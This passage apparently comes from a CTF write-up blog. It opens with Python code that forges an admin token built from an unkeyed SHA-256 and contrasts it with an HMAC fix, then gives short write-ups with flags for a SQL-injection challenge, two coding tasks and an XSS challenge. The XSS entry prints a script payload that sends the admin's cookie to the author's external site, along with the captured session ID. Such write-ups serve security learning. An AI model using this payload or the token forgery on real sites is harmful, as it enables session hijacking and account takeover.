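    return base64.b64encode(s.encode()).decode()


def duck_preimage(username: str, cookie: str, token: str) -> str:
    """b64(username) + "." + b64(cookie) + "." + b64(token), periods kept,
    exactly as the write-up lays it out in step 9."""
    return ".".join([b64(username), b64(cookie), b64(token)])


def duck_token(username: str, cookie: str, token: str) -> str:
    """The challenge's scheme: an unkeyed SHA-256 over values the attacker
    knows or controls (username and token leaked through SQL injection,
    cookie set in the attacker's own browser), hence forgeable."""
    return hashlib.sha256(duck_preimage(username, cookie, token).encode()).hexdigest()


SERVER_SECRET = b"assumed-server-side-secret"   # hypothetical; never leaves the server


def keyed_token(username: str, cookie: str, token: str, key: bytes = SERVER_SECRET) -> str:
    """What would have blocked the forgery: the same preimage under HMAC-SHA256
    with a key only the server holds, so knowing every field is not enough."""
    return hmac.new(key, duck_preimage(username, cookie, token).encode(), hashlib.sha256).hexdigest()


def validate(submitted: str, expected: str) -> bool:
    """Constant-time comparison, so the check itself leaks nothing."""
    return hmac.compare_digest(submitted, expected)


# Values from the write-up (the cookie as it appears inside the step 9 base64).
ADMIN_USER = "DuckDuckGoose"
ADMIN_COOKIE = "%7B%22username%22%3A%22DuckDuckGoose%22%2C%22admin%22%3A1%7D"
ADMIN_TOKEN = "d4rkw1ng"

if __name__ == "__main__":
    forged = duck_token(ADMIN_USER, ADMIN_COOKIE, ADMIN_TOKEN)
    print("preimage:", duck_preimage(ADMIN_USER, ADMIN_COOKIE, ADMIN_TOKEN))
    print("forged  :", forged, validate(forged, duck_token(ADMIN_USER, ADMIN_COOKIE, ADMIN_TOKEN)))
    # The forger lacks SERVER_SECRET, so the unkeyed hash never validates against the keyed one.
    print("keyed   :", validate(forged, keyed_token(ADMIN_USER, ADMIN_COOKIE, ADMIN_TOKEN)))
```

The leaked admin token would still be a problem under the keyed scheme (it should never be readable through the application's SQL), but on its own it would no longer be enough to mint a valid token.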

TU CTF 2016: Student Grades (Web) Write-up

Descriptions:
We are trying to find out what our grade was, but we don't seem to be in the database...
Can you help us out?
http://104.199.151.39/index.html
Solution: 

1. "in the database..." in the description makes me sure it is about SQL Injection.

2. The index page has an input for the name whose grade you want to show.


3. View the source of index.html and get some script.


4. Line 46 is vulnerable to SQL Injection, but line 50 means the data will be sent with md5 to postQuery.php by ajax.


5. In the Response tab, I found a comment that tells me the SQL query statement.


6. Write a python script to get the data at each step. Found Database: tuctf, Tables: tuctf_grades, tuctf_info, tuctf_junk, Columns: item, value, and the Flag is stored in tuctf_info.



7. select value from tuctf_info


Python Script:


Flag: TUCTF{v4ccinate_y0ur_databa5e5}

Monday, 22 February 2016

Internetwache CTF 2016: It's Prime Time! (Code) Write-up

Description:
We all know that prime numbers are quite important in cryptography. Can you help me to find some?
Solution: 


Flag: IW{Pr1m3s_4r3_!mp0rt4nt}

Internetwache CTF 2016: A numbers game (Code) Write-up

Description:
People either love or hate math. Do you love it? Prove it! You just need to solve a bunch of equations without a mistake.
Solution: 


Flag: IW{M4TH_1S_34SY}

Sunday, 7 February 2016

Sharif CTF 2016: PhotoBlog (Web) Write-up

Description:
A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea? The Blog
Solution:

1. Accessing the blog, I found input fields (user, comment, captcha), and user and comment are vulnerable to Cross-site Scripting (XSS)


2. The description tells me "want to login as admin", so I write custom JavaScript to steal the admin's cookie and put it in a comment.
<script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' +  encodeURI(document.cookie);</script>

3. Wait a minute and some cookie shows up in my site's access log.
/icheernoom.php?cookies=PHPSESSID=515386866780b5f132fc96c02b3ddb82

4. "Login as admin": I guess the admin page is /admin.php, find it and get redirected to /login.php. Try to access it with the admin's cookie


Flag: 1b7a60600d5731739c0e2115bd4ebf7c